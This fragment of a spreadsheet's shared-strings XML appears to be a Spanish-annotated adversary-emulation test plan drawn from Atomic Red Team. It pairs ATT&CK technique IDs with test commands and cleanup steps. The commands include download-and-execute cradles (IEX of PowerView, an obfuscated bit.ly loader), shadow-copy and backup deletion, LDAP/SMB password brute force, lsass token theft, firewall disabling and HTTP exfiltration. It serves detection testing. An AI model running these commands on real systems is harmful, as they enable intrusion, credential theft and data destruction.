$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&amp;A1&amp;`"\AppData\Local\Temp\`"&amp;A2&amp;`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&amp;A1&amp;`"\AppData\Local\Temp\`"&amp;A3&amp;`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&amp;A1&amp;`"\AppData\Local\Temp\`"&amp;A2&amp;`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlApp</t>
  </si>
  <si>
    <t>Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore</t>
  </si>
  <si>
    <t>Potentially Unwanted Applications (PUA)</t>
  </si>
  <si>
    <t>Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe &amp; $env:TEMP/PotentiallyUnwanted.exe</t>
  </si>
  <si>
    <t>Remove-Item $env:TEMP/PotentiallyUnwanted.exe</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Malicious User Agents</t>
  </si>
  <si>
    <t>Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest www.google.com -UserAgent "*&lt;|&gt;*" | out-null</t>
  </si>
  <si>
    <t>Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
C:\Windows\System32\Curl.exe -s -A "HttpBrowser/1.0" -m3 www.google.com &gt;nul 2&gt;&amp;1
C:\Windows\System32\Curl.exe -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com &gt;nul 2&gt;&amp;1
C:\Windows\System32\Curl.exe -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com &gt;nul 2&gt;&amp;1
C:\Windows\System32\Curl.exe -s -A "*&lt;|&gt;*" -m3 www.google.com &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1566.01</t>
  </si>
  <si>
    <t>Download Phishing Attachment - VBScript</t>
  </si>
  <si>
    <t>if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
  return 'Please install Microsoft Excel before running this test.'
}
else{
  $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
  $fileName = 'PhishingAttachment.xlsm'
  New-Item -Type File -Force -Path $fileName | out-null
  $wc = New-Object System.Net.WebClient
  $wc.Encoding = [System.Text.Encoding]::UTF8
  [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
  Invoke-WebRequest -Uri $url -OutFile $fileName
}</t>
  </si>
  <si>
    <t>Word spawned a command shell and used an IP address in the command line</t>
  </si>
  <si>
    <t>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"C:\Users\Public\art.jse`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"</t>
  </si>
  <si>
    <t>Word debe estar instalado</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Create and Execute Batch Script</t>
  </si>
  <si>
    <t>Remove-Item $env:TEMP\T1059.003_script.bat -Force -ErrorAction Ignore</t>
  </si>
  <si>
    <t>New-Item $env:TEMP\T1059.003_script.bat -Force | Out-Null
Set-Content -Path $env:TEMP\T1059.003_script.bat -Value "dir"
Start-Process $env:TEMP\T1059.003_script.bat</t>
  </si>
  <si>
    <t>Writes text to a file and displays it.</t>
  </si>
  <si>
    <t>echo "Mensaje desde cmd" &gt; %TEMP%\test.bin &amp; type %TEMP%\test.bin</t>
  </si>
  <si>
    <t>del %TEMP%\test.bin</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>certutil -encode C:\Windows\System32\calc.exe %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files Or Information</t>
  </si>
  <si>
    <t>del %temp%\T1140_calc.txt &gt;nul 2&gt;&amp;1
del %temp%\T1140_calc_decoded.exe &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>copy %windir%\system32\certutil.exe %temp%\tcm.tmp
%temp%\tcm.tmp -encode C:\Windows\System32\calc.exe %temp%\T1140_calc2.txt
%temp%\tcm.tmp -decode %temp%\T1140_calc2.txt %temp%\T1140_calc2_decoded.exe</t>
  </si>
  <si>
    <t>del %temp%\tcm.tmp &gt;nul 2&gt;&amp;1
del %temp%\T1140_calc2.txt &gt;nul 2&gt;&amp;1
del %temp%\T1140_calc2_decoded.exe &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Certutil Rename and Decode</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>at 13:20 /interactive cmd</t>
  </si>
  <si>
    <t>At.exe Scheduled task</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task Startup Script</t>
  </si>
  <si>
    <t>schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"</t>
  </si>
  <si>
    <t>schtasks /delete /tn "T1053_005_OnLogon" /f &gt;nul 2&gt;&amp;1
schtasks /delete /tn "T1053_005_OnStartup" /f &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Scheduled task Local</t>
  </si>
  <si>
    <t>SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 72600</t>
  </si>
  <si>
    <t>SCHTASKS /Delete /TN spawn /F &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Scheduled task Remote</t>
  </si>
  <si>
    <t>SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 72600</t>
  </si>
  <si>
    <t>SCHTASKS /Delete /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /F &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>WMI Invoke-CimMethod Scheduled Task</t>
  </si>
  <si>
    <t>$xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }</t>
  </si>
  <si>
    <t>Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false &gt;$null 2&gt;&amp;1</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>Bitsadmin Download</t>
  </si>
  <si>
    <t>bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin1_flag.ps1</t>
  </si>
  <si>
    <t>del %temp%\bitsadmin1_flag.ps1 &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\bitsadmin2_flag.ps1</t>
  </si>
  <si>
    <t>Remove-Item $env:TEMP\bitsadmin2_flag.ps1 -ErrorAction Ignore</t>
  </si>
  <si>
    <t>Persist, Download, &amp; Execute</t>
  </si>
  <si>
    <t>bitsadmin.exe /create AtomicBITS
bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1
bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32
otepad.exe ""
bitsadmin.exe /resume AtomicBITS
timeout 5
bitsadmin.exe /complete AtomicBITS</t>
  </si>
  <si>
    <t>del %temp%\bitsadmin3_flag.ps1 &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>List Windows Firewall Rules</t>
  </si>
  <si>
    <t>netsh advfirewall firewall show rule name=all</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Delete Volume Shadow Copies</t>
  </si>
  <si>
    <t>if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
vssadmin.exe create shadow /for=c:
vssadmin.exe delete shadows /all /quiet</t>
  </si>
  <si>
    <t>Delete Volume Shadow Copies via WMI</t>
  </si>
  <si>
    <t>wmic.exe shadowcopy delete</t>
  </si>
  <si>
    <t>wbadmin Delete Windows Backup Catalog</t>
  </si>
  <si>
    <t>wbadmin delete catalog -quiet</t>
  </si>
  <si>
    <t>Delete Volume Shadow Copies via WMI with PowerShell</t>
  </si>
  <si>
    <t>Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}</t>
  </si>
  <si>
    <t>Delete Backup Files</t>
  </si>
  <si>
    <t>del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Basic Permission Groups Discovery Windows</t>
  </si>
  <si>
    <t>net localgroup
net localgroup "Administrators"</t>
  </si>
  <si>
    <t>Permission Groups Discovery PowerShell</t>
  </si>
  <si>
    <t>get-localgroup
Get-LocalGroupMember -Name "Administrators"</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>netsh.exe advfirewall  show allprofiles
tasklist.exe
tasklist.exe | findstr /i virus
tasklist.exe | findstr /i cb
tasklist.exe | findstr /i defender
tasklist.exe | findstr /i cylance</t>
  </si>
  <si>
    <t>get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
get-process | ?{$_.Description -like "*cylance*"}</t>
  </si>
  <si>
    <t>fltmc.exe | findstr.exe 385201</t>
  </si>
  <si>
    <t>AV Discovery via WMI</t>
  </si>
  <si>
    <t xml:space="preserve">si </t>
  </si>
  <si>
    <t>wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List</t>
  </si>
  <si>
    <t>Modify Registry of Current User Profile</t>
  </si>
  <si>
    <t>Modify Registry of Local Machine</t>
  </si>
  <si>
    <t>Modify registry to store logon credentials</t>
  </si>
  <si>
    <t>Change Powershell Execution Policy to Bypass</t>
  </si>
  <si>
    <t>Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine</t>
  </si>
  <si>
    <t>et-ExecutionPolicy -ExecutionPolicy Default -Scope LocalMachine</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>del /f /q /s %TEMP%\T1010.exe &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>New-Item -Type Directory (split-path PathToAtomicsFolder\T1010\src\T1010.cs) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "PathToAtomicsFolder\T1010\src\T1010.cs"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out: %TEMP%\T1010.exe PathToAtomicsFolder\T1010\src\T1010.cs %TEMP%\T1010.exe</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize</t>
  </si>
  <si>
    <t>Applications Installed</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum</t>
  </si>
  <si>
    <t>Hostname Discovery</t>
  </si>
  <si>
    <t>hostname</t>
  </si>
  <si>
    <t>Environment variables discovery on windows</t>
  </si>
  <si>
    <t>set</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>fsutil usn deletejournal /D C:</t>
  </si>
  <si>
    <t>Indicator Removal using FSUtil</t>
  </si>
  <si>
    <t>fsutil usn createjournal m=1000 a=100 c:</t>
  </si>
  <si>
    <t>Pruebas iguales a la 12.03</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery - net</t>
  </si>
  <si>
    <t>net view /domain
net view</t>
  </si>
  <si>
    <t>Remote System Discovery - net group Domain Computers</t>
  </si>
  <si>
    <t>net group "Domain Computers" /domain</t>
  </si>
  <si>
    <t>Validar grupos</t>
  </si>
  <si>
    <t>Remote System Discovery - nltest</t>
  </si>
  <si>
    <t>nltest.exe /dclist:domain.local</t>
  </si>
  <si>
    <t>Remote System Discovery - arp</t>
  </si>
  <si>
    <t>arp -a</t>
  </si>
  <si>
    <t>Remote System Discovery - nslookup</t>
  </si>
  <si>
    <t>$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Windows Internal Packet Capture</t>
  </si>
  <si>
    <t>netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10</t>
  </si>
  <si>
    <t>netsh trace stop
TIMEOUT /T 50
del %temp%\trace.etl
del %temp%\trace.cab</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>ID tecnica</t>
  </si>
  <si>
    <t>Enumerate Active Directory Groups</t>
  </si>
  <si>
    <t>Get-AdGroup -Filter *</t>
  </si>
  <si>
    <t>Payload</t>
  </si>
  <si>
    <t>Discover Domain Admins</t>
  </si>
  <si>
    <t xml:space="preserve">[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-NetLocalGroupMember  </t>
  </si>
  <si>
    <t>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainComputer</t>
  </si>
  <si>
    <t>Discover local hosts</t>
  </si>
  <si>
    <t>Enumerate Active Directory Computers with Get-AdComputer</t>
  </si>
  <si>
    <t xml:space="preserve">psh  </t>
  </si>
  <si>
    <t>Get-AdComputer -Filter *</t>
  </si>
  <si>
    <t>no</t>
  </si>
  <si>
    <t>Get-wmiobject to Enumerate Domain Controllers</t>
  </si>
  <si>
    <t>get-wmiobject -class ds_computer -namespace root\directory\ldap</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy</t>
  </si>
  <si>
    <t>get-addefaultdomainpasswordpolicy</t>
  </si>
  <si>
    <t>Enumerate Root Domain linked policies Discovery</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}</t>
  </si>
  <si>
    <t>Adfind - Enumerate Active Directory Admins</t>
  </si>
  <si>
    <t>Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile PathToAtomicsFolder\T1087.002\src\AdFind.exe; PathToAtomicsFolder\T1087.002\src\AdFind.exe -sc admincountdmp</t>
  </si>
  <si>
    <t>Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)</t>
  </si>
  <si>
    <t>if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) {;   Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported";   exit 1; }; [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null; $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("$env:UserDnsDomain",389); $passwordList = Get-Content -Path 5cb955_passwords.txt; foreach ($password in $passwordList){;   $credz = new-object System.Net.NetworkCredential("$ENV:USERNAME", $password, "$env:UserDnsDomain");   $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM);   try {;     Write-Host " [-] Attempting ${password} on account $ENV:USERNAME.";     $conn.bind();     Write-Host " [!] $ENV:USERNAME:${password} are valid credentials!";   } catch {;     Write-Host $_.Exception.Message;   }; }; Write-Host "End of bruteforce"</t>
  </si>
  <si>
    <t>Brute Force Credentials of single Active Directory domain users via SMB</t>
  </si>
  <si>
    <t>echo Password1&gt; passwords.txt &amp;&amp; echo 1q2w3e4r&gt;&gt; passwords.txt &amp;&amp; echo Password!&gt;&gt; passwords.txt &amp;&amp; echo Spring2022&gt;&gt; passwords.txt &amp;&amp; echo ChangeMe!&gt;&gt; passwords.txt &amp;&amp; @FOR /F "delims=" %p in (passwords.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\USUARIO" "%p" 1&gt;NUL 2&gt;&amp;1 &amp;&amp; @echo [*] #{user}:%p &amp;&amp; @net use /delete %logonserver%\IPC$ &gt; NUL</t>
  </si>
  <si>
    <t xml:space="preserve">Cambiar usuario </t>
  </si>
  <si>
    <t>Domain Account and Group Manipulate</t>
  </si>
  <si>
    <t>Try {;     Import-Module ActiveDirectory -ErrorAction Stop | Out-Null;      ; } ; Catch {;     if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {;   Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online; } else {;   Install-WindowsFeature RSAT-AD-PowerShell; }; };  ;  $x = Get-Random -Minimum 2 -Maximum 99; $y = Get-Random -Minimum 2 -Maximum 99; $z = Get-Random -Minimum 2 -Maximum 99; $w = Get-Random -Minimum 2 -Maximum 99; Import-Module ActiveDirectory; $account = "#{account_prefix}-$x$y$z"; New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False; Add-ADGroupMember "#{group}" $account</t>
  </si>
  <si>
    <t>Get-ADUser -LDAPFilter "(&amp;(samaccountname=atr--*)(givenName=Test))" | Remove-ADUser -Confirm:$False</t>
  </si>
  <si>
    <t>Network Interface Configuration</t>
  </si>
  <si>
    <t>ipconfig</t>
  </si>
  <si>
    <t>Process Discovery - tasklist</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>tasklist</t>
  </si>
  <si>
    <t>Get-LocalGroup; Get-LocalGroupMember -Name "Administrators";([ADSI]"WinNT://./Administrators").psbase.Invoke('Members') | % {([ADSI]$_).InvokeGet('AdsPath')}</t>
  </si>
  <si>
    <t>Enumerate all accounts (Domain)</t>
  </si>
  <si>
    <t>net user /domain &amp;&amp; net group /domain</t>
  </si>
  <si>
    <t>Examine domain password policy - Windows</t>
  </si>
  <si>
    <t>net accounts /domain</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>New-Item -Type Directory (split-path PathToAtomicsFolder\T1134.002\src\GetToken.ps1) -ErrorAction ignore | Out-Null;
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/src/GetToken.ps1" -OutFile "PathToAtomicsFolder\T1134.002\src\GetToken.ps1";
Set-ExecutionPolicy -Scope Process Bypass -Force; $owners = @{}; gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}; Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}; PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")</t>
  </si>
  <si>
    <t>netsh advfirewall set currentprofile state off</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Disable Microsoft Defender Firewall</t>
  </si>
  <si>
    <t>Extracting passwords with findstr</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>findstr /si pass *.xml *.doc *.txt *.xls; ls -R | select-string -ErrorAction SilentlyContinue -Pattern password</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Curl Download File</t>
  </si>
  <si>
    <t>C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\allthethingsx64.dll</t>
  </si>
  <si>
    <t>del c:\users\public\music\allthethingsx64.dll &gt;nul 2&gt;&amp;1 &amp;&amp; del c:\users\public\music\allthethingsx64.dll &gt;nul 2&gt;&amp;1 &amp;&amp; del c:\programdata\allthethingsx64.dll &gt;nul 2&gt;&amp;1 &amp;&amp; del %Temp%\allthethingsx64.dll &gt;nul 2&gt;&amp;1</t>
  </si>
  <si>
    <t>USB Malware Spread Simulation</t>
  </si>
  <si>
    <t>$RemovableDrives=@(); $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID; ForEach ($Drive in $RemovableDrives) { write-host "Removable Drive Found:" $Drive; New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives." }</t>
  </si>
  <si>
    <t>$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID; ForEach ($Drive in $RemovableDrives); {; Remove-Item -Path $Drive\T1091Test1.txt -Force -ErrorAction Ignore; }</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>IcedID Botnet HTTP PUT</t>
  </si>
  <si>
    <t>$fileName = "C:\temp\T1020_exfilFile.txt"; $url = "https://google.com"; $file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"; $contentType = "application/octet-stream"; try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}</t>
  </si>
  <si>
    <t>$fileName = "C:\temp\T1020_exfilFile.txt"; Remove-Item -Path $fileName -ErrorAction Ignore</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltrate data HTTPS using curl windows</t>
  </si>
  <si>
    <t>New-Item -Type Directory (split-path PathToAtomicsFolder/T1048.002/src/artifact) -ErrorAction ignore | Out-Null;
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact" -OutFile "PathToAtomicsFolder/T1048.002/src/artifact";</t>
  </si>
  <si>
    <t>Radmin Viewer Utility</t>
  </si>
  <si>
    <t>echo Downloading radmin installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" %TEMP%\RadminViewer.msi
msiexec /i "%TEMP%\RadminViewer.msi" /qn
%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe</t>
  </si>
  <si>
    <t>ATHPowerShellCommandLineParameter -Command parameter variations</t>
  </si>
  <si>
    <t>$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable; if (-not $RequiredModule) {Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force};  ;  Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation C -Execute -ErrorAction Stop</t>
  </si>
  <si>
    <t>(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))); (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs(); Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&amp;( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))</t>
  </si>
  <si>
    <t>Obfuscation Tests</t>
  </si>
  <si>
    <t>Run BloodHound from local disk</t>
  </si>
  <si>
    <t>Remove-Item $env:Temp\*BloodHound.zip -Force</t>
  </si>
  <si>
    <t>Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\T1059.001\src\SharpHound.ps1"
write-host "Import and Execution of SharpHound.ps1 from PathToAtomicsFolder\T1059.001\src" -ForegroundColor Cyan
import-module PathToAtomicsFolder\T1059.001\src\SharpHound.ps1
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5</t>
  </si>
  <si>
    <t>Write-Host 'Please Enable "C$" share on 127.0.0.1';
Out-File -FilePath "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password";
copy-item -Path "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password" -Destination "$Env:TEMP\Easter_egg.password"</t>
  </si>
  <si>
    <t>Copy a sensitive File over Administive share with Powershell</t>
  </si>
  <si>
    <t>copy \\127.0.0.1\C$\Windows\temp\Easter_Bunny.password %TEMP%\Easter_egg.password</t>
  </si>
  <si>
    <t>Copy a sensitive File over Administive share with copy</t>
  </si>
  <si>
    <t>Debe existir el archivo password</t>
  </si>
  <si>
